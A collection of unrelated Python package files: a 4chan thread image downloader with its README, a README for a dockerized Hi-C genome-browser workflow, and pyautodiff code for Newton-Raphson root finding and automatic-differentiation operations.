        r = self.session.get(url)
        t = Thread.from_req(self, res, r)
        if t is not None:
            # Cache for future lookups; Thread.update() evicts it on 404.
            self._cache[res] = t
        return t

    def page(self, page=1, update_each=False):
        """ Return all the threads in a single page.
        The page number is one-indexed. First page is 1, second is 2, etc.
        If a thread has already been cached, return the cache entry rather
        than making a new thread.

        :param page: page to pull threads from
        :type page: int
        :param update_each: should each thread be updated, to pull all
                            replies
        :type update_each: bool
        :return: a list of :class:`fourch.Thread` objects, corresponding to
                 all threads on given page
        :rtype: list
        """
        url = self.url("api_board", board=self.name, page=page)
        r = self.session.get(url)
        if r.status_code != requests.codes.ok:
            r.raise_for_status()
        json = r.json()
        threads = []
        for thj in json["threads"]:
            t = None
            res = thj["posts"][0]["no"]
            if res in self._cache:
                # Reuse the cached thread but flag it stale: page JSON only
                # carries a preview of the replies.
                t = self._cache[res]
                t._should_update = True
            else:
                t = Thread.from_json(self,
                                     thj,
                                     last_modified=r.headers["last-modified"])
                self._cache[res] = t
            if update_each:
                t.update()
            threads.append(t)
        return threads

    def thread_exists(self, res):
        """ Figure out whether or not a thread exists.
        This is as easy as checking if it 404s.

        :param res: the thread number to fetch
        :type res: str or int
        :return: whether or not the given thread exists
        :rtype: bool
        """
        url = self.url("api_thread", board=self.name, thread=res)
        return self.session.head(url).status_code == requests.codes.ok
4channel is a python3 tool and module to download all images/webm from a 4channel thread.
Installation
---------------
### Dependencies
4channel requires:
- python (>= 3.6)
### User installation
```
pip install 4channel
```
Usage
---------
```
usage: 4channel [-h] [--webm] [--watch] [--dryrun] [-r RECURSE] url [out]
positional arguments:
url the url of the thread.
out specify output directory (optional)
optional arguments:
-h, --help show this help message and exit
--webm in addition to images also download webm videos.
--watch watch the thread every 60 seconds for new images.
--dryrun dry run without actually downloading images.
-r RECURSE, --recurse RECURSE
recursively download images if 1st post contains link to previous thread up to specified depth
examples:
python -m fourchannel https://boards.4channel.org/g/thread/76759434#p76759434
import fourchannel as f
f.download(url='https://boards.4channel.org/g/thread/76759434#p76759434')
```
| 4channel | /4channel-0.0.9.tar.gz/4channel-0.0.9/README.md | README.md |
import sys, json, os
import urllib.request
import urllib.parse
import argparse
import time
import signal
import re
"""
notes:
- for module to be importable, it is good idea not to do ArgumentParser in global scope
- to avoid typing 'import fourchannel.fourchannel' and then 'fourchannel.fourchannel.download'
'from .fourchannel import download' was added to __init__.py
"""
URL = 'https://a.4cdn.org/'  # 4chan JSON API base
IMAGE_URL = 'https://i.4cdn.org/'  # 4chan media CDN base
allowed_types = ['.jpg', '.png', '.gif']  # '.webm' is appended when --webm is given
watching = False  # True in --watch mode (suppresses per-file "skipping" output)
max_retry = 1  # remaining retries against the archive API after a 404
resorted_to_archive = False  # set once the live thread 404s and we switch to archived.moe
hit_cloudflare_block = False  # set when warosu.org starts answering with cloudflare 503s
list_of_cloudflare_blocked_media_file = []  # URLs to be fetched manually in a browser
def fuuka_retrieve(result, board, thread, dryrun):
    """Download media referenced by a FoolFuuka-style archive JSON payload
    (archived.moe), fetching the actual files from the warosu.org mirror.

    ``result`` is the parsed archive JSON keyed by thread number.  Once a
    cloudflare block is detected, remaining URLs are only recorded in
    ``list_of_cloudflare_blocked_media_file`` for manual retrieval.
    """
    i = 0  # count of files successfully downloaded
    global hit_cloudflare_block
    global list_of_cloudflare_blocked_media_file
    for post in result[thread]['posts']:
        if result[thread]['posts'][post]['media'] is None:
            continue
        filename = result[thread]['posts'][post]['media']['media_orig']
        if filename[filename.index('.'):] in allowed_types and not os.path.exists(filename):
            if not dryrun:
                # retrieve file from warosu.org, https://i.warosu.org/data/<board>/img/0xxx/xx/<filename>
                thread_first_3nums = '0' + thread[:3]
                thread_forth_and_fifth_nums = thread[3:5]
                url_warosu = 'https://i.warosu.org/data/' + board + '/img/' + thread_first_3nums + '/' + thread_forth_and_fifth_nums + '/' + filename
                if not hit_cloudflare_block:
                    print(f"downloading (unknown)")
                    # The mirror rejects the default urllib user-agent.
                    req = urllib.request.Request(url_warosu, headers={'User-Agent': 'Mozilla/5.0'})
                    try:
                        response = urllib.request.urlopen(req)
                        with open(filename, "wb") as file:
                            file.write(response.read())
                        i = i+1
                    except urllib.error.HTTPError as e:
                        # A 503 served by cloudflare means we are being rate
                        # limited/blocked; stop fetching and just record URLs.
                        if e.code in [503] and e.hdrs['Server'] == 'cloudflare':
                            hit_cloudflare_block = True
                            print(f"hit cloudflare block: {e}")
                else:
                    print(f"cloudflare block, download {url_warosu} manually in the browser")
                    list_of_cloudflare_blocked_media_file.append(url_warosu)
            else:
                print(f"skipping (unknown), dryrun")
        else:
            if not watching:
                print(f"skipping (unknown), already present")
    print(f"downloaded {i} files from https://i.warosu.org/ thread# {thread}")
# loops through posts of given thread and downloads media files
def load_thread_json(board, thread, url, recurse, dryrun=False):
    """Fetch the JSON for *thread* from *url* and download its media files.

    Falls back to the archived.moe (FoolFuuka) API when the live thread has
    404'd, and follows "previous thread" links in the OP comment up to
    *recurse* levels deep.

    :param board: board name, e.g. 'g'
    :param thread: thread number as a string
    :param url: the JSON endpoint to fetch (live API or archive API)
    :param recurse: how many "previous thread" links to follow
    :param dryrun: when True, report what would be downloaded without fetching
    """
    global resorted_to_archive
    response = None
    # True when *this* invocation talks to the FoolFuuka archive API, whose
    # JSON layout differs from 4chan's and whose media lives on warosu.org.
    archive_url_is_being_used_for_this_stack_frame_so_call_fuuka = False
    try:
        if resorted_to_archive is True:
            archive_url_is_being_used_for_this_stack_frame_so_call_fuuka = True
            # The archive rejects the default urllib user-agent.
            req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
            response = urllib.request.urlopen(req)
        else:
            response = urllib.request.urlopen(url)
    except urllib.error.HTTPError as e:
        if e.code in [404]:
            if not resorted_to_archive:
                # Live thread is gone -- retry against the archive API.
                resorted_to_archive = True
                newurl = '%s=%s&num=%s' % ('https://archived.moe/_/api/chan/thread?board', board, thread)
                print(f"url {url} returned 404, resorting to {newurl}")
                load_thread_json(board, thread, newurl, recurse-1, dryrun)
            else:
                global max_retry
                max_retry = max_retry - 1
                if max_retry < 1:
                    return
                else:
                    # Fix: retry the *same* archive URL.  The previous code
                    # passed 'newurl', which is never bound in this branch of
                    # a fresh call frame and raised NameError on retries.
                    print(f"archive url {url} returned 404, retrying...")
                    load_thread_json(board, thread, url, recurse, dryrun)
        else:
            print(f"unhandled error: {e}")
        return
    try:
        result = json.loads(response.read())
        op_subject = ''
        op_post_time = ''
        if recurse > 0:
            # Look for a "previous thread" link in the OP comment and recurse.
            try:
                op_comment = ''
                if archive_url_is_being_used_for_this_stack_frame_so_call_fuuka is True:
                    # for json from fuuka the tread# to previous thread is in slightly different place
                    op_comment = result[thread]['op']['comment']
                    op_subject = result[thread]['op']['title']
                    op_post_time = result[thread]['op']['fourchan_date']
                    prev_thread_num = re.search(r'.*[pP]revious:? (?:[tT]hread:)?\s*.*?(\d{8}).*', op_comment).group(1)
                    newurl = '%s=%s&num=%s' % ('https://archived.moe/_/api/chan/thread?board', board, prev_thread_num)
                    print(f"recursing to archive thread# {prev_thread_num} at {newurl}")
                    load_thread_json(board, prev_thread_num, newurl, recurse-1, dryrun)
                else:
                    op_comment = result['posts'][0]['com']
                    op_subject = result['posts'][0]['sub'] if result['posts'][0].get('sub') is not None else 'No title'
                    op_post_time = result['posts'][0]['now']
                    prev_thread_num = re.search(r'.*[pP]revious:? (?:[tT]hread:)?\s*.*?(\d{8}).*', op_comment).group(1)
                    prev_thread_path = '/' + board + '/thread/' + prev_thread_num
                    split = urllib.parse.urlparse('https://boards.4channel.org' + prev_thread_path).path.replace('/', ' ').split()
                    newurl = '%s%s/thread/%s.json' % (URL, split[0], split[2])
                    print(f"recursing to {prev_thread_path}")
                    load_thread_json(board, split[2], newurl, recurse-1, dryrun)
            except AttributeError:
                # re.search returned None: the OP has no previous-thread link.
                print(f"did not find a link to previous thread. the comment was:\n---\n{op_comment}\n---")
                pass
        if archive_url_is_being_used_for_this_stack_frame_so_call_fuuka is True:
            fuuka_retrieve(result, board, thread, dryrun)
        else:
            i = 0  # files downloaded
            total_bytes_dw = 0  # bytes downloaded
            for post in result['posts']:
                try:
                    filename = str(post['tim']) + post['ext']
                    if post['ext'] in allowed_types and not os.path.exists(filename):
                        if not dryrun:
                            print(f"downloading (unknown)")
                            fn, headers = urllib.request.urlretrieve(IMAGE_URL + board + '/' + filename, filename)
                            total_bytes_dw = total_bytes_dw + int(headers['Content-Length'])
                            i = i+1
                        else:
                            print(f"skipping (unknown), dryrun")
                    else:
                        if not watching:
                            print(f"skipping (unknown), already present")
                except KeyError:
                    # Post has no attachment ('tim'/'ext' missing).
                    continue
            print(f"downloaded {'%.*f%s' % (2, total_bytes_dw / (1<<20), 'MB')} of {i} files from {url} ({op_subject}) ({op_post_time})")
    except ValueError:
        sys.exit('no response, thread deleted?')
# the key function that that we expect to be used when 4channel is imported as a module
# this function parses user's URL and calls load_thread_json() that does the actual downloading
def download(**kwargs):
    """Download all media of the 4channel thread given by kwargs['url'].

    Recognised keys: url (required), out, webm, watch, dryrun, recurse.
    Creates (and chdirs into) the output directory, then delegates to
    load_thread_json(); in --watch mode it polls the thread every 60 seconds
    forever.
    """
    if 'boards.4channel.org' not in kwargs.get('url'):
        sys.exit("you didn't enter a valid 4channel URL")
    if kwargs.get('recurse') is None:
        kwargs['recurse'] = 0 # handle case when module is imported and .download() is called with just url
    # Path "/g/thread/76759434" -> ['g', 'thread', '76759434'].
    split = urllib.parse.urlparse(kwargs.get('url')).path.replace('/', ' ').split()
    board, thread = split[0], split[2]
    url = '%s%s/thread/%s.json' % (URL, board, thread)
    # Default output directory is the thread number.
    outdir = kwargs.get('out') if kwargs.get('out') is not None else thread
    try:
        os.mkdir(outdir)
        print(f"created {os.path.join(os.getcwd(), outdir)} directory...")
    except OSError:
        # Directory already exists: resume into it.
        print(f"{outdir} directory already exists, continuing...")
        pass
    if os.path.basename(os.getcwd()) != outdir:
        os.chdir(outdir)
    if kwargs.get('webm') is True:
        allowed_types.append('.webm')
    if kwargs.get('watch') is True:
        global watching
        watching = True
        print(f"watching /{board}/{thread} for new images")
        while True:
            load_thread_json(board, thread, url, 0)
            time.sleep(60)
    else:
        print(f"downloading /{board}/{thread}")
        load_thread_json(board, thread, url, kwargs.get('recurse'), kwargs.get('dryrun'))
        if hit_cloudflare_block:
            # Leave a list of URLs the user has to fetch manually.
            with open('_cloudflare_blocked_files.txt', "w") as f:
                print(*list_of_cloudflare_blocked_media_file, sep="\n", file=f)
        os.chdir("..")
def signal_handler(signal, frame):
    """SIGINT/CTRL-C handler: print a farewell message and exit cleanly."""
    farewell = '\nSIGINT or CTRL-C detected, exiting gracefully'
    print(farewell)
    sys.exit(0)
def main():
    """Command-line entry point: parse arguments, install the SIGINT handler,
    and start the download."""
    cli = argparse.ArgumentParser()
    cli.add_argument("url", help='the url of the thread.')
    cli.add_argument("out", nargs='?', help='specify output directory (optional)')
    cli.add_argument("--webm", action="store_true", help="in addition to images also download webm videos.")
    cli.add_argument("--watch", action='store_true', help='watch the thread every 60 seconds for new images.')
    cli.add_argument("--dryrun", action="store_true", help="dry run without actually downloading images.")
    cli.add_argument('-r', "--recurse", type=int, default=0, help="recursively download images if 1st post contains link to previous thread up to specified depth")
    parsed = cli.parse_args()
    signal.signal(signal.SIGINT, signal_handler)
    download(**vars(parsed))  # pass in args as dict and unpack


if __name__ == '__main__':
    main()
# 4DGB Workflow
![](doc/workflow.png)
A dockerized application implementing an end-to-end workflow to process Hi-C data files and displaying their structures in an instance of the [4D Genome Browser](https://github.com/lanl/4DGB).
The workflow takes ```.hic``` data, processes the data and creates a running server that can be used to view the data with a web browser. The system takes advantage of previous runs, so if you've already computed some data, it won't be recomputed the next time the workflow is run.
The workflow is split into two stages: "Build" and "View". Each implemented with a separate docker image. The Build stage does most of the computation (including the most expensive part, running the LAMMPS simulation) and outputs a project suitable for viewing with the [4D Genome Browser](https://github.com/lanl/4DGB). The View stage simply creates an instance of this browser, allowing the user to view their project.
## Setting up Input Data
1. Create a directory to contain all of your input data. In it, create a `workflow.yaml` file with the following format:
```yaml
project:
resolution: 200000 # optional (defaults to 200000)
chromosome: X # optional (defaults to 'X')
count_threshold: 2.0 # optional (defaults to 2.0)
datasets:
- name: "Data 01"
hic: "path/to/data_01.hic"
- name: "Data 02"
hic: "path/to/data_02.hic"
```
*See the [File Specification Document](doc/project.md) for full details on what can be included in the input data*
2. Checkout submodules
```sh
git submodule update --init
```
3. Build the Docker images.
```sh
make docker
```
4. Run the browser!
```sh
./4DGBWorkflow run /path/to/project/directory/
```
**Example output:**
```
$ ./4DGBWorkflow run ./example_project
[>]: Building project... (this may take a while)
#
# Ready!
# Open your web browser and visit:
# http://localhost:8000/compare.html?gtkproject=example_project
#
# Press [Ctrl-C] to exit
#
```
If this is the first time running a project, this may take a while, since it needs to run a molecular dynamics simulation with LAMMPS on your input data. The next time you run it, it won't need to run the simulation again. If you update the input files, then the simulation will automatically be re-run!
**Example Screenshot**
![](doc/example_screen.png)
## Help for Maintainers
See the [Publishing](./doc/publishing.md) doc for information on publishing and releasing new versions.
## ❄️ For Nix Users
For initiates of the [NixOS cult](https://nixos.org/), there is a Nix Flake which exports a package of the workflow builder as well as a development environment in which you can easily run the workflow. Each submodule also has its own flake exporting relevant packages.
To enter the development environment (you need to enable submodules):
```sh
nix develop '.?submodules=1'
```
To build a project and run the browser:
```sh
# Build the workflow script
nix build '.?submodules=1#workflow-build'
# Run the just-built workflow
./result/bin/4dgb-workflow-build example_project/ example_out/
# Run the browser (which is available in the PATH in the dev environment)
PROJECT_HOME=example_out/ gtkserver.py
```
| 4dgb-workflow | /4dgb-workflow-1.5.6.tar.gz/4dgb-workflow-1.5.6/README.md | README.md |
import numpy as np
from matplotlib import pyplot as plt
from pyautodiff import *
def Newton_Raphson_method(fn, xk, stepsize_thresh=1e-6, max_iters=1000, success_tolerance=1e-6, debug=False):
    """
    Find a root of ``fn`` with the Newton-Raphson iteration.

    Handles both scalar and vector problems: each update solves
    f'(x) * delta = -f(x), using plain division in the scalar case and
    np.linalg.solve in the vector case.

    Args:
        fn: callable mapping a Var to a Var (so value and derivative are both available).
        xk: initial guess (scalar, or an np.ndarray for the vector case).
        stepsize_thresh: stop once ||delta_x|| drops below this.
        max_iters: maximum number of iterations before giving up.
        success_tolerance: absolute tolerance for declaring fn(root) == 0.
        debug: if True, print per-iteration progress.

    Returns:
        A dict with keys "succeed", "iter", "x", "f(x)", "f'(x)".
    """
    result = None
    scalar_problem = (np.ndim(xk) == 0)
    step_norm = abs if scalar_problem else np.linalg.norm
    solve_step = (lambda jac, rhs: rhs / jac) if scalar_problem else np.linalg.solve
    extra = 1
    for it in range(max_iters):
        # Evaluate fn on a Var: .val carries f(x), .diff() carries f'(x).
        result = fn(Var(xk, "x"))
        delta_x = solve_step(result.diff(), -result.val)
        if step_norm(delta_x) < stepsize_thresh:
            extra = 0
            break
        if debug:
            print(f"k={it}\tx={np.round(xk, 2)}\tf(x)={np.round(result.val)}\tf'(x)={np.round(result.diff())}")
        xk = xk + delta_x
    return {
        "succeed": np.allclose(result.val, 0, atol=success_tolerance),
        "iter": it + extra,
        "x": xk,
        "f(x)": result.val,
        "f\'(x)": result.diff()
    }
def cal_val_der(fn, xs):
    """
    Evaluate fn at every point in xs, returning parallel lists of values and derivatives.

    Points where fn raises (e.g. log of a non-positive number) are replaced by
    a placeholder Var(0) so the returned lists stay aligned with xs.

    Args:
        fn: callable mapping a Var to a Var.
        xs: iterable of numbers or Var/VarAutoName instances.

    Returns:
        (vals, ders): two lists with fn's values and derivatives at each x.
    """
    vals = []
    ders = []
    for x in xs:
        try:
            # Wrap plain numbers so fn always receives a differentiable Var.
            if not isinstance(x, (Var, VarAutoName)):
                y = fn(VarAutoName(x))
            else:
                y = fn(x)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # still propagate; the appends were moved out of a `finally`.
            y = Var(0)
        vals.append(y.val)
        ders.append(y.diff())
    return vals, ders
def draw_scalar(fn, roots, plt_range=[0, 10]):
    """Plot fn's value and derivative over plt_range and mark the given roots."""
    xs = np.linspace(plt_range[0], plt_range[1], 1000).tolist()
    vals, ders = cal_val_der(fn, xs)
    fig, axes = plt.subplots()
    axes.plot(xs, vals, label='val')
    axes.plot(xs, ders, label='der')
    # Mark each supplied root on the value curve.
    axes.scatter(roots, cal_val_der(fn, roots)[0], label="root")
    axes.grid(True, which='both')
    axes.axhline(y=0, color='k')
    axes.axvline(x=0, color='k')
    plt.title("Use 0 to fill in +-inf")
    plt.legend()
    plt.show()
if __name__ == '__main__':
    # Demo 1: scalar root finding for f(x) = x^(-x) - log(x).
    print("====Scalar demo====")
    f = lambda x: x ** (-x) - log(x)
    rtn = Newton_Raphson_method(f, 1, debug=True)
    if rtn['succeed']:
        root = rtn["x"]
        print(f"Find a root={np.round(root, 4)}")
        # Plot the function around the found root.
        draw_scalar(f, [root], plt_range=[0.1, root + 0.5])
    else:
        print(f"Failed. Try another x0 or larger max_iters!")
        print(rtn)
        draw_scalar(f, [], plt_range=[1, 5])
    # Demo 2: vector root finding for g(x) = A @ x - sin(exp(x)), tried from
    # several starting points (each may converge to a different root).
    print("====Vector demo====")
    A = Var(np.array([[1, 2], [3, 4]]))
    g = lambda x: A @ x - sin(exp(x))
    n_roots = 0
    for x0 in [[1, -1], [1, 1], [0, 0]]:
        x0 = np.array(x0).reshape(-1, 1)  # column vector
        rtn = Newton_Raphson_method(g, x0, debug=False)
        if rtn["succeed"]:
            n_roots += 1
            root = rtn["x"]
            print(f"Find #{n_roots} root={np.round(root, 2).tolist()}")
        else:
            print(f"Failed. Try another x0 or larger max_iters!")
import math
from collections import defaultdict
from functools import wraps
import numpy as np
from pyautodiff import Var, Mode
def _dunder_wrapper(fn, is_unary=False):
"""
A wrapper function to bridge dunder method and classmethod (operation).
For example, Var.__add__ = dunder_wrapper(VarAdd.binary_operation).
Or Var.__add__ = lambda a, b: VarAdd.binary_operation(a, b)
Args:
fn: operation function
is_unary: Defaults to False for binary operations like Add, Substract; True for unary operations like abs, exp.
Returns:
The wrapped function.
"""
@wraps(fn)
def wrapper(*args):
a = args[0]
if is_unary:
return fn(a)
b = args[1]
return fn(a, b)
return wrapper
class Ops:
    """
    A template class for all operations for class `Var` (i.e. unary and binary operations).
    For each operation, users MUST implement (at least) two functions: `op()` and `local_derivative()`.
    Non-element-wise operations should re-write some more methods. See 'VarTranspose' and 'VarMatMul' as reference.
    Then the propagation for forward/reverse/mix mode will be auto handled by the pipeline, which is located in
    `binary_operation()` and `unary_operation()`.

    Derivatives are stored as 4D tensors D with D[i, j, k, l] = d out[i, j] / d wrt[k, l]
    (scalars are treated as 1x1 matrices); see the `Var` class docstring.
    """
    # Number of operands: 1 for unary operations (default);
    # binary operations override this with 2.
    n_operands = 1
    # A string to be displayed in the computational graph.
    # If None, the suffix of the class name will be used.
    # For example, exp (operation) will show `Exp` since its class name is `VarExp` in the plot.
    # See ../visualization.py for its usage.
    symbol = None
    @classmethod
    def op(cls, va, vb):
        """
        Implement the numerical value operation in this function.
        For unary operation: vc = f(va), return vc;
        For binary operation: vc = va op vb, return vc;
        To be implemented by each operation.
        Args:
            va: numerical value of operand a (a.val, a is a Var instance);
            vb: numerical value of operand b (b.val, b is a Var instance); None for unary operations.
        Returns:
            A Number or np.ndarray, the numerical value of this operation
        """
        raise NotImplementedError
    @classmethod
    def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
        """
        Calculate the derivative for every elementary operation.
        For unary operation: c = f(a), return the local partial derivative: df/da;
        For binary operation: c = a op b, return the local partial derivatives df/da, df/db;
        (a, b could be results of some operations)
        For example,
            x = Var(1, 'x')
            a = x + 1
            b = 2 - x
            c = a * b
        The local derivative dc/da = 1, dc/db = 2;
        The target derivative dc/dx = dc/da*da/dx + dc/db*db/dx = 1*1 + 2*(-1) = -1
        Args:
            va: numerical value of operand (a Var instance) a (=a.val);
            vb: numerical value of operand (a Var instance) b (=b.val);
            vc: numerical value of operation result (a Var instance) c (=c.val);
            skip_lda: If a is a constant, no need to calculate dc/da
            skip_ldb: If b is a constant, no need to calculate dc/db
        Returns:
            A Number or np.ndarray for unary operation;
            A list of two Numbers or np.ndarrays for binary operation;
        """
        raise NotImplementedError
    @classmethod
    def chain_rule(cls, lda, da, ldb, db, forward_mode=True):
        """
        Apply chain rule in forward mode.
        For composite function: c = g(f(a, b)), dg/dx = dg/df*df/dx; dg/dy = dg/df*df/dy;
        Args:
            lda: A Number or np.ndarray, represents the local derivative: dc/da
            da: a dict stores the derivative of a.
                For example, {'x': da/dx, 'y': da/dy}, where `x`,'y' is the involved variables.
            ldb: A Number or np.ndarray, represents the local derivative: dc/db
            db: a dict stores the derivative of b.
                For example, {'x': db/dx, 'y': db/dy}, where `x`,'y' is the involved variables.
            forward_mode: defaults to True; False for reverse or mix mode.
        Returns:
            A dict stores the derivative of c by applying the chain rule. For example,
            {'x': dc/dx, 'y': dc/dy} where `x`,'y' are the target variables.
        """
        # For element-wise ops the 2D local derivative has the operand's shape:
        # forward mode multiplies it into the first two axes of da/dx (the
        # operand/output element axes "ij"); reverse mode multiplies it into
        # the last two axes of df/dc (the operand element axes "kl").
        einsum_dispatcher = "ijkl,ij->ijkl" if forward_mode else "ijkl,kl->ijkl"
        def _apply(d, ld):
            # d is None for a missing operand (unary op): nothing to accumulate.
            if d is None:
                return
            ndim = np.ndim(ld)
            if ndim == 0:
                # Scalar local derivative: plain elementwise scaling.
                fn = lambda tot, loc: tot * loc
            elif ndim == 2:
                fn = lambda tot, loc: np.einsum(einsum_dispatcher, tot, loc)
            else:
                raise TypeError(f"Local derivative only supports scalar or 2D matrix but not {np.shape(ld)}")
            for wrt in d:
                dc[wrt] += fn(d[wrt], ld)
        dc = defaultdict(int)
        _apply(da, lda)
        _apply(db, ldb)
        return dict(dc)
    @classmethod
    def merge_var_shapes(cls, sa, sb=None):
        """
        Propagate the _var_shapes to the operation result by synthesizing the _var_shapes of a and b.
        BE CAREFUL, a _var_shapes (dict) instance can be shared across multiple var instances.
        Don't use _var_shapes for any instance specific calculation.
        Args:
            sa: _var_shapes of the first operand
            sb: _var_shapes of the second operand, could be None
        Returns:
            a dict, the merged _var_shapes
        """
        if sb is None:
            return sa
        if sa is None:
            return sb
        sa.update(sb)
        return sa
    @classmethod
    def merge_modes(cls, ma, mb=None):
        """
        Merge mode by such rules:
        1. Forward op reverse/mix --> mix
        2. Forward op forward/NONE --> forward
        3. Reverse op reverse/NONE --> reverse
        4. Reverse/mix/NONE op mix --> mix
        5. NONE op NONE --> NONE
        Args:
            ma: a.mode
            mb: b.mode
        Returns:
            A mode value
        """
        if mb is None or mb == Mode.NONE:
            return ma
        if ma == Mode.NONE:
            return mb
        if ma != mb:
            return Mode.Mix
        return ma
    @classmethod
    def fwdprop(cls, a, b, val):
        """
        Propagation for forward mode. Suppose current operation : c = a op b is one step of f(x), by chain rule,
        we have: dc/dx = dc/da * da/dx + dc/db * db/dx, return dc/dx.
        Args:
            a: the first operand, a Var instance
            b: the second operand, a Var instance, could be None
            val: the numerical operation result
        Returns:
            a dict, the derivative of operation result instance
        """
        if cls.n_operands == 2:
            lda, ldb = cls.local_derivative(a.val, b.val, val,
                                            skip_lda=a.is_const,
                                            skip_ldb=b.is_const)
            return cls.chain_rule(lda, a.derivative, ldb, b.derivative)
        lda = cls.local_derivative(a.val, None, val)
        return cls.chain_rule(lda, a.derivative, None, None)
    @classmethod
    def backprop(cls, a, b, val, dfdc):
        """
        Propagation for reverse/mix mode. Suppose current operation : c = a op b is one step of f(x), by chain rule,
        we have: df/da = df/dc * dc/da, df/db = df/dc * dc/db.
        Args:
            a: the first operand, a Var instance
            b: the second operand, a Var instance, could be None
            val: the numerical operation result
            dfdc: the backprop gradient.
        Returns:
            None (results are written into the operands' _bpgrad dicts)
        """
        # NOTE(review): dict.update overwrites rather than accumulates per key;
        # presumably safe because each node's _bpgrad is consumed/merged by the
        # traversal in Var (see _degree bookkeeping) -- confirm.
        if cls.n_operands == 2:
            lda, ldb = cls.local_derivative(a.val, b.val, val,
                                            skip_lda=a.is_const,
                                            skip_ldb=b.is_const)
            a._bpgrad.update(cls.chain_rule(lda, dfdc, None, None, False))
            b._bpgrad.update(cls.chain_rule(None, None, ldb, dfdc, False))
        else:
            lda = cls.local_derivative(a.val, None, val)
            a._bpgrad.update(cls.chain_rule(lda, dfdc, None, None, False))
    @classmethod
    def merge_fwd_backprop(cls, dcdxs, dfdc):
        """
        Merge derivatives from forward mode and reverse mode. Suppose current node is c, in mix mode. W.r.t x, we have
        dc/dx and df/dc, then PART of df/dx is df/dc * dc/dx.
        Args:
            dcdxs: a dict like {'x': dcdx, 'y': dcdy}
            dfdc: a dict like {f: dfdc}
        Returns:
            a dict like {'x': dfdc (part), 'y': dfdy (part)}
        """
        dfdxs = {}
        for wrt in dcdxs:
            # Contract over c's element axes: df/dx[k,l,p,q] = sum_ij df/dc[k,l,i,j] * dc/dx[i,j,p,q]
            dfdxs[wrt] = np.einsum("ijpq, klij->klpq", dcdxs[wrt], dfdc)
        return dfdxs
    @classmethod
    def binary_operation(cls, a, b):
        """
        A universal binary operation process. Newly defined operations (class) do not need to re-write it.
        Args:
            a: a Number or np.ndarray or `Var` instance, the first operand of the calculation
            b: a Number or np.ndarray or `Var` instance, the second operand of the calculation
        Returns:
            A `Var` instance whose `.val` is the numerical value of the operation and `.derivative` containing
            the derivative w.r.t. the involved variables.
        """
        # Promote raw numbers/arrays to (constant) Vars.
        if not isinstance(a, Var):
            a = Var(a)
        if not isinstance(b, Var):
            b = Var(b)
        # Stop numpy auto broadcasting but allow the operation between scalar and vector,
        # or the differentiation would be too complicated to deal with
        if np.ndim(a.val) > 0 and np.ndim(b.val) > 0 and cls.__name__ != "VarMatMul":
            assert a.val.shape == b.val.shape, f"Shapes mismatch: {a.val.shape} != {b.val.shape}"
        # S1: calculate numerical result
        val = cls.op(a.val, b.val)
        # S2: get mode of the result
        mode = cls.merge_modes(a.mode, b.mode)
        # Prepare params for constructing a Var instance to contain the operation result
        params = dict(derivative={},
                      _var_shapes=cls.merge_var_shapes(a._var_shapes, b._var_shapes),
                      mode=mode,
                      _context=[cls, [a, b]])
        # Reverse/mix mode vars will calculate derivative later (when .diff() is called)
        if mode not in (Mode.Forward, Mode.NONE):
            return Var(val, **params)
        params["derivative"] = cls.fwdprop(a, b, val)
        return Var(val, **params)
    @classmethod
    def unary_operation(cls, a):
        """
        A universal unary operation process. Newly defined operations (class) do not need to re-write it.
        Args:
            a: a Number or np.ndarray or `Var` instance, the first operand of the calculation
        Returns:
            A `Var` instance whose `.val` is the numerical value of the operation and `.derivative` containing
            the derivative w.r.t. the involved variables.
        """
        # Promote raw numbers/arrays to (constant) Vars.
        if not isinstance(a, Var):
            a = Var(a)
        # S1: calculate numerical result
        val = cls.op(a.val, None)
        # S2: inherit the mode for the result
        mode = a.mode
        # Prepare params for constructing a Var instance to contain the operation result
        params = dict(derivative={},
                      _var_shapes=cls.merge_var_shapes(a._var_shapes),
                      mode=mode,
                      _context=[cls, [a]])
        # Reverse/mix mode vars will calculate derivative later (when .diff() is called)
        if mode not in (Mode.Forward, Mode.NONE):
            return Var(val, **params)
        params["derivative"] = cls.fwdprop(a, None, val)
        return Var(val, **params)
class VarNeg(Ops):
    """
    Unary negation operator: c = -a.

    Supplies the value computation and the local derivative (dc/da = -1)
    consumed by the generic Ops pipeline.

    To use:
    >>> -Var(1, 'x')
    (<class 'pyautodiff.var.Var'> name: None val: -1, der: {'x': array([[[[-1.]]]])})
    """
    symbol = "-"

    @classmethod
    def op(cls, va, vb):
        # vb is unused: negation is a unary operation.
        return -va

    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d(-a)/da == -1 everywhere.
        return -1
class VarPos(Ops):
    """
    Unary plus operator: c = +a (identity).

    The value passes through unchanged and the local derivative is dc/da = 1.

    >>> +Var(1, 'x')
    (<class 'pyautodiff.var.Var'> name: None val: 1, der: {'x': array([[[[1.]]]])})
    """
    symbol = "+"

    @classmethod
    def op(cls, va, vb):
        # Identity: unary plus leaves the value untouched.
        return va

    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d(+a)/da == 1 everywhere.
        return 1
class VarAbs(Ops):
    """
    Absolute value: c = |a|.

    The local derivative is the sign of a: -1 where a < 0, +1 elsewhere
    (the non-differentiable point a == 0 is assigned derivative 1).

    >>> abs(Var(1, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 1, der: {'x': array([[[[1.]]]])})
    """

    @classmethod
    def op(cls, va, vb):
        return abs(va)

    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        d = np.ones_like(va)
        d[va < 0] = -1
        # Return a plain Python scalar for size-1 input, an array otherwise.
        # Narrowed from a bare `except:`: ndarray.item() raises ValueError
        # (and only ValueError) when the array has more than one element.
        try:
            return d.item()
        except ValueError:
            return d
class VarAdd(Ops):
    """
    Binary addition: c = a + b.

    Local derivatives are dc/da = 1 and dc/db = 1.

    >>> Var(1, 'x') + 1
    (<class 'pyautodiff.var.Var'> name: None val: 2, der: {'x': array([[[[1.]]]])})
    >>> Var(1, 'x') + Var(2, 'y')
    (<class 'pyautodiff.var.Var'> name: None val: 3, der: {'x': array([[[[1.]]]]), 'y': array([[[[1.]]]])})
    """
    n_operands = 2
    symbol = "+"

    @classmethod
    def op(cls, va, vb):
        return va + vb

    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # Addition contributes a unit derivative to each operand.
        return 1, 1
class VarSub(Ops):
    """
    Binary subtraction: c = a - b.

    Local derivatives are dc/da = 1 and dc/db = -1.

